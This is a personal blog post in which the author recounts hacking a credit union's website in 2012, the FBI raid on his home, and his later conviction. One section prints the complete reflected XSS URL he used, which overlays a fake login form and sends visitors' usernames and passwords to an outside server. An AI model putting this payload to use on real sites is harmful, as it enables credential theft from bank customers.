Home I Hacked a Bank and Got Arrested in 2012
Post
Cancel

I Hacked a Bank and Got Arrested in 2012

Knock Knock

Seeing as a decade has passed, I sort of finally need to do it for me, to put it on paper, how it happened. How I got busted by the FBI. In mid-2012 on a warm summer day, while I was asleep in my bedroom at approximately 4 in the afternoon. Nobody except me was home at the time they arrived, peeping through my windows, and walking across my lawn, but seeing as my mother was just getting home with my Grandma Butch (who coincidentally got me into computers in the first place, as a kid, with a Tandy 1500HD and DOS), saw some guys in suits buzzing around the house looking in windows and such. What happened between this, and me actually waking up, I’m not sure. But where I come in is hearing my mother pounding very loudly on my bedroom door, which I kept locked while living at my parent’s house. “Marshall! Marshall wake up!” she screamed. “What do you want? Go away, I’m sleeping”, I said. “The FBI is here.”, she said, as I rolled out of bed, her still hammering on the door. I opened the door, and immediately said, “that’s not funny.” but as soon as I got a good look at her face, I knew it wasn’t a joke to her. So I rounded the corner to go to the front door and opened it. Standing before me was one bigger agent, and another about the same height but slimmer build agent. The short conversation that transpired from here on went something like:

“Marshall Whittaker?”
“Yes, what is this about?”
“Do you know anything about Truliant Federal Credit Union?”
“No, I don’t know what you’re talking about.”
“Well, we think you do.”
“Come in.”

The kitchen table

The slimmer one sat down in hte kitchen, at the breakfast room table, and told me to have a seat. The first thing I thought was, what, this guy is telling me to have a seat where I live? I didn’t say anything and sat, as he was slapping a large vanilla envelope down on the glass top, all I could think of was that it felt like that scene out of the Matrix movie.

matrix interrogation scene

He tried to chat me up while the other agents were busiily going in and out of my room, removing computers, and other electronic equipment that had storage, such as USB flash drives, my Playstation 3, burned CDs, etc. My memory gets a little blurry here as to what was actually said, there was a lot going on. I remember at one point they were telling me what types of charges I was going to be indicted with, and my mother handing me an entire bottle of Klonopin, and saying “I hope he never uses a computer again.” Well, thanks for that, Mom. In hindsight, I never should have talked to them at all, and lawyered up immediately, but my entire family, including myself, is very naive when it comes to police interrogations. As a result, I ended up blabbing on myself, about how it happened, why I thought it was a good idea to post on a forum about it, offering to sell the hack for bitcoin, then going back the next day and removing the post. Why I was idiotic enough to march my ass down to Truliant’s office in Winston-Salem and tell them about how I hacked them. Yes, I told them I’d done it, and showed them how. They stated that the vulnerability had been in the source for over two years untouched, I seem to think, this being before bug bounties were commonplace, that this is simply because they were a financial institution and nobody else was dumb enough to poke the bee hive.

Source code

The actual hack? Technologically pathetic:

hxxp://www.truliantfcu.org/kb_landing.php?quickQuestionValue=blah%22%20id=%22silvercloudFrm%22%3E%3C/iframe%3E%3Cdiv%20name=%22fuckyou%22%20style=%22position:absolute;%20height:400px;%20width:850px;%20left:10;%20top:190;%20overflow:auto;%20z-index:99;%20background:%23fff;%22%3EPlease%20enter%20your%20Username%20and%20Password:%3Cbr%3E%3Cbr%3E%3Cform%20name=%22input%22%20action=%22http://joette.net/cgi-bin/unpw.pl%22%20method=%22post%22%3EUsername:%3Cinput%20type=%22text%22%20name=%22user%22%20/%3E%3Cbr%3EPassword:%20%3Cinput%20type=%22text%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/div%3E%3C/form%3E%20%3Ciframe%20style=%22border:0px;%20width:%200px;%20height:%200px;%22%20src=%22www.google.com%22%20%3C/iframe%3E&x=0&y=0&x=0&y=0           

The code will XSS a search page, hijacking it with some CSS to cover up the old page and create a new login-like page that uses embedded JavaScript that will send the login credentials off to an offsite server. Sometimes - just that simple.

Unintended consequences

Note: If you ever do anything illegal like this, DO NOT TALK ABOUT IT. EVER.

They reminded me that I did it over tor, which I suppose was by instinct, but it didn’t matter much if I was going to call them up, then go down to the office, then tell the damn FBI what I did when they asked, did it? I ended up finding this scrolled about 12 years back in Facebook Messenger, where I had shown a hacker buddy what I was up to as well. The sole good thing about getting caught is that now I can make this blog blost without fear of being arrested again.

Note: Always encrypt your shit.

I had years of legal trouble, was finally convicted of two counts of computer crimes (count two: “Attempt to Unlawfully Obtain Information by Computer from a Financial Instution” for this action, then another count for an unrelated hack involving a Department of Defense database I dumped). In the midst of the investigation, they found an unencrypted USB hard drive with the later database on it, which I also received charges for. I was totally blacklisted from obtaining security clearence for 5 years after the end of two years probation. I ended up working fast food jobs for the next decade because of this. It still makes it difficult to find employment in infosec, so if you have an opening and think I may be a good fit let me know!. My lawyer expresses that I am now, a decade later, available in my full capacity to work in the computer feild. In the end I’m left with this shiny piece of resume fodder:

Court Documents

Don’t do it kids, it’s not nearly as funny when the men in black show up.

The whole thing was collossally stupid, but it does make for a fun party story.

This post is licensed under CC BY 4.0 by the author.

An Intermediate Iptables Configuration Walkthrough

Crash course in Elasticsearch Logstash and Kibana log aggregation

Comments powered by Disqus.